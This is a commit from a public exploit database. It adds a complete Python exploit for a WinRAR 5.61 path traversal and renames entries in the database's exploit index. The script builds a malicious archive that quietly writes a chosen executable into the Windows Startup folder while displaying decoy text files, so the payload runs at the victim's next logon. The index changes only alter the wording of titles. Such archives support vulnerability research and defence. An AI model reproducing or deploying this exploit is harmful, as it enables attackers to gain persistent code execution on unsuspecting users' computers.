DB: 2019-03-17
1 changes to exploits/shellcodes WinRAR 5.61 - Path Traversal Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit) Nuuo Central Management - (Authenticated) SQL Server SQL Injection (Metasploit) Splunk Enterprise 7.2.3 - Authenticated Custom App RCE Splunk Enterprise 7.2.3 - (Authenticated) Custom App Remote Code Execution LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference LogonBox Limited / Hypersocket Nervepoint Access Manager - (Unauthenticated) Insecure Direct Object Reference VA MAX 8.3.4 - Authenticated Remote Code Execution VA MAX 8.3.4 - (Authenticated) Remote Code Execution WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
This commit is contained in:
Offensive Security
parent
790034e7df
commit
ab4683fee8
2 changed files with 126 additions and 7 deletions
118
exploits/windows/local/46552.py
Executable file
118
exploits/windows/local/46552.py
Executable file
|
|
@ -0,0 +1,118 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
import os
|
||||
import re
|
||||
import zlib
|
||||
import binascii
|
||||
|
||||
# The archive filename you want
|
||||
rar_filename = "test.rar"
|
||||
# The evil file you want to run
|
||||
evil_filename = "calc.exe"
|
||||
# The decompression path you want, such shown below
|
||||
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
|
||||
# Other files to be displayed when the victim opens the winrar
|
||||
# filename_list=[]
|
||||
filename_list = ["hello.txt", "world.txt"]
|
||||
|
||||
class AceCRC32:
|
||||
def __init__(self, buf=b''):
|
||||
self.__state = 0
|
||||
if len(buf) > 0:
|
||||
self += buf
|
||||
|
||||
def __iadd__(self, buf):
|
||||
self.__state = zlib.crc32(buf, self.__state)
|
||||
return self
|
||||
|
||||
def __eq__(self, other):
|
||||
return self.sum == other
|
||||
|
||||
def __format__(self, format_spec):
|
||||
return self.sum.__format__(format_spec)
|
||||
|
||||
def __str__(self):
|
||||
return "0x%08x" % self.sum
|
||||
|
||||
@property
|
||||
def sum(self):
|
||||
return self.__state ^ 0xFFFFFFFF
|
||||
|
||||
def ace_crc32(buf):
|
||||
return AceCRC32(buf).sum
|
||||
|
||||
def get_ace_crc32(filename):
|
||||
with open(filename, 'rb') as f:
|
||||
return ace_crc32(f.read())
|
||||
|
||||
def get_right_hdr_crc(filename):
|
||||
# This command may be different, it depends on the your Python3 environment.
|
||||
p = os.popen('py -3 acefile.py --headers %s'%(filename))
|
||||
res = p.read()
|
||||
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
|
||||
result = pattern.findall(res)
|
||||
right_hdr_crc = result[0].upper()
|
||||
return hex2raw4(right_hdr_crc)
|
||||
|
||||
def modify_hdr_crc(shellcode, filename):
|
||||
hdr_crc_raw = get_right_hdr_crc(filename)
|
||||
shellcode_new = shellcode.replace("6789", hdr_crc_raw)
|
||||
return shellcode_new
|
||||
|
||||
def hex2raw4(hex_value):
|
||||
while len(hex_value) < 4:
|
||||
hex_value = '0' + hex_value
|
||||
return hex_value[2:] + hex_value[:2]
|
||||
|
||||
def hex2raw8(hex_value):
|
||||
while len(hex_value) < 8:
|
||||
hex_value = '0' + hex_value
|
||||
return hex_value[6:] + hex_value[4:6] + hex_value[2:4] + hex_value[:2]
|
||||
|
||||
def get_file_content(filename):
|
||||
with open(filename, 'rb') as f:
|
||||
return str(binascii.hexlify(f.read()))[2:-1] # [2:-1] to remote b'...'
|
||||
|
||||
def make_shellcode(filename, target_filename):
|
||||
if target_filename == "":
|
||||
target_filename = filename
|
||||
hdr_crc_raw = "6789"
|
||||
hdr_size_raw = hex2raw4(str(hex(len(target_filename)+31))[2:])
|
||||
packsize_raw = hex2raw8(str(hex(os.path.getsize(filename)))[2:])
|
||||
origsize_raw = packsize_raw
|
||||
crc32_raw = hex2raw8(str(hex(get_ace_crc32(filename)))[2:])
|
||||
filename_len_raw = hex2raw4(str(hex(len(target_filename)))[2:])
|
||||
filename_raw = "".join("{:x}".format(ord(c)) for c in target_filename)
|
||||
content_raw = get_file_content(filename)
|
||||
shellcode = hdr_crc_raw + hdr_size_raw + "010180" + packsize_raw \
|
||||
+ origsize_raw + "63B0554E20000000" + crc32_raw + "00030A005445"\
|
||||
+ filename_len_raw + filename_raw + "01020304050607080910A1A2A3A4A5A6A7A8A9"
|
||||
return shellcode
|
||||
|
||||
def build_file(shellcode, filename):
|
||||
with open(filename, "wb") as f:
|
||||
f.write(binascii.a2b_hex(shellcode.upper()))
|
||||
|
||||
def build_file_add(shellcode, filename):
|
||||
with open(filename, "ab+") as f:
|
||||
f.write(binascii.a2b_hex(shellcode.upper()))
|
||||
|
||||
def build_file_once(filename, target_filename=""):
|
||||
shellcode = make_shellcode(filename, target_filename)
|
||||
build_file_add(shellcode, rar_filename)
|
||||
shellcode_new = modify_hdr_crc(shellcode, rar_filename)
|
||||
content_raw = get_file_content(rar_filename).upper()
|
||||
build_file(content_raw.replace(shellcode.upper(), shellcode_new.upper()).replace("01020304050607080910A1A2A3A4A5A6A7A8A9", get_file_content(filename)), rar_filename)
|
||||
|
||||
if __name__ == '__main__':
|
||||
print("[*] Start to generate the archive file %s..."%(rar_filename))
|
||||
|
||||
shellcode_head = "6B2831000000902A2A4143452A2A141402001018564E974FF6AA00000000162A554E524547495354455245442056455253494F4E2A"
|
||||
build_file(shellcode_head, rar_filename)
|
||||
|
||||
for i in range(len(filename_list)):
|
||||
build_file_once(filename_list[i])
|
||||
|
||||
build_file_once(evil_filename, target_filename)
|
||||
|
||||
print("[+] Evil archive file %s generated successfully !"%(rar_filename))
|
||||
|
|
@ -10359,6 +10359,7 @@ id,file,description,date,author,type,platform,port
|
|||
46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware,
|
||||
46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,
|
||||
46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows,
|
||||
46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
@ -17240,7 +17241,7 @@ id,file,description,date,author,type,platform,port
|
|||
46392,exploits/windows/remote/46392.txt,"mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution",2019-02-18,ProofOfCalc,remote,windows,
|
||||
46436,exploits/hardware/remote/46436.rb,"Belkin Wemo UPnP - Remote Code Execution (Metasploit)",2019-02-20,Metasploit,remote,hardware,
|
||||
46444,exploits/hardware/remote/46444.txt,"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass",2019-02-21,"Jacob Baines",remote,hardware,
|
||||
46449,exploits/windows/remote/46449.rb,"Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)",2019-02-22,Metasploit,remote,windows,5180
|
||||
46449,exploits/windows/remote/46449.rb,"Nuuo Central Management - (Authenticated) SQL Server SQL Injection (Metasploit)",2019-02-22,Metasploit,remote,windows,5180
|
||||
46469,exploits/hardware/remote/46469.py,"Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow",2019-02-28,"Artem Metla",remote,hardware,
|
||||
46501,exploits/java/remote/46501.py,"Java Debug Wire Protocol (JDWP) - Remote Code Execution",2016-12-20,IOactive,remote,java,
|
||||
46506,exploits/hardware/remote/46506.rb,"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)",2019-03-07,AkkuS,remote,hardware,
|
||||
|
|
@ -40859,7 +40860,7 @@ id,file,description,date,author,type,platform,port
|
|||
46234,exploits/php/webapps/46234.txt,"Joomla! Component JHotelReservation 6.0.7 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80
|
||||
46235,exploits/php/webapps/46235.txt,"SimplePress CMS 1.0.7 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80
|
||||
46237,exploits/cgi/webapps/46237.txt,"SirsiDynix e-Library 3.5.x - Cross-Site Scripting",2019-01-24,AkkuS,webapps,cgi,80
|
||||
46238,exploits/windows/webapps/46238.py,"Splunk Enterprise 7.2.3 - Authenticated Custom App RCE",2019-01-24,"Lee Mazzoleni",webapps,windows,8000
|
||||
46238,exploits/windows/webapps/46238.py,"Splunk Enterprise 7.2.3 - (Authenticated) Custom App Remote Code Execution",2019-01-24,"Lee Mazzoleni",webapps,windows,8000
|
||||
46239,exploits/php/webapps/46239.txt,"ImpressCMS 1.3.11 - 'bid' SQL Injection",2019-01-24,"Mehmet Onder",webapps,php,80
|
||||
46240,exploits/hardware/webapps/46240.html,"Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery",2019-01-24,"Ali Can Gönüllü",webapps,hardware,80
|
||||
46243,exploits/hardware/webapps/46243.txt,"Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection",2019-01-25,"RedTeam Pentesting",webapps,hardware,
|
||||
|
|
@ -40869,7 +40870,7 @@ id,file,description,date,author,type,platform,port
|
|||
46251,exploits/java/webapps/46251.txt,"Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting",2019-01-28,"Ishaq Mohammed",webapps,java,80
|
||||
46252,exploits/php/webapps/46252.txt,"WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download",2019-01-28,41!kh4224rDz,webapps,php,80
|
||||
46253,exploits/hardware/webapps/46253.html,"AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery",2019-01-28,"Ali Can Gönüllü",webapps,hardware,80
|
||||
46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple,
|
||||
46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - (Unauthenticated) Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple,
|
||||
46259,exploits/php/webapps/46259.txt,"CMSsite 1.0 - 'cat_id' SQL Injection",2019-01-28,"Majid kalantari",webapps,php,80
|
||||
46260,exploits/php/webapps/46260.txt,"CMSsite 1.0 - 'search' SQL Injection",2019-01-28,"Majid kalantari",webapps,php,80
|
||||
46262,exploits/hardware/webapps/46262.py,"Cisco RV300 / RV320 - Information Disclosure",2019-01-28,"Harom Ramos",webapps,hardware,
|
||||
|
|
@ -40906,7 +40907,7 @@ id,file,description,date,author,type,platform,port
|
|||
46438,exploits/php/webapps/46438.txt,"C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection",2019-02-21,"Carlos Avila",webapps,php,
|
||||
46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443
|
||||
46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80
|
||||
46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
|
||||
46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - (Authenticated) Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
|
||||
46349,exploits/linux/webapps/46349.txt,"CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting",2019-02-11,DKM,webapps,linux,
|
||||
46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80
|
||||
46351,exploits/php/webapps/46351.txt,"OPNsense < 19.1.1 - Cross-Site Scripting",2019-02-12,"Ozer Goker",webapps,php,80
|
||||
|
|
@ -40922,7 +40923,7 @@ id,file,description,date,author,type,platform,port
|
|||
46374,exploits/php/webapps/46374.txt,"DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
|
||||
46375,exploits/php/webapps/46375.txt,"DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
|
||||
46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
|
||||
46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80
|
||||
46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection",2019-02-14,B0UG,webapps,php,80
|
||||
46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80
|
||||
46384,exploits/php/webapps/46384.txt,"MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2019-02-15,0xB9,webapps,php,80
|
||||
46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,
|
||||
|
|
@ -40981,7 +40982,7 @@ id,file,description,date,author,type,platform,port
|
|||
46520,exploits/php/webapps/46520.txt,"DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery",2019-03-08,ManhNho,webapps,php,
|
||||
46525,exploits/multiple/webapps/46525.rb,"Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,multiple,
|
||||
46526,exploits/jsp/webapps/46526.rb,"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,jsp,
|
||||
46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80
|
||||
46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80
|
||||
46528,exploits/php/webapps/46528.py,"Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution",2019-03-11,redtimmysec,webapps,php,
|
||||
46531,exploits/php/webapps/46531.html,"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)",2019-03-12,"Gionathan Reale",webapps,php,80
|
||||
46537,exploits/php/webapps/46537.txt,"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion",2019-03-13,"Manuel García Cárdenas",webapps,php,80
|
||||
|
|
@ -40989,7 +40990,7 @@ id,file,description,date,author,type,platform,port
|
|||
46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php,
|
||||
46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80
|
||||
46545,exploits/multiple/webapps/46545.txt,"NetData 1.13.0 - HTML Injection",2019-03-15,s4vitar,webapps,multiple,
|
||||
46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80
|
||||
46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80
|
||||
46548,exploits/php/webapps/46548.txt,"ICE HRM 23.0 - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
|
||||
46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
|
||||
46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue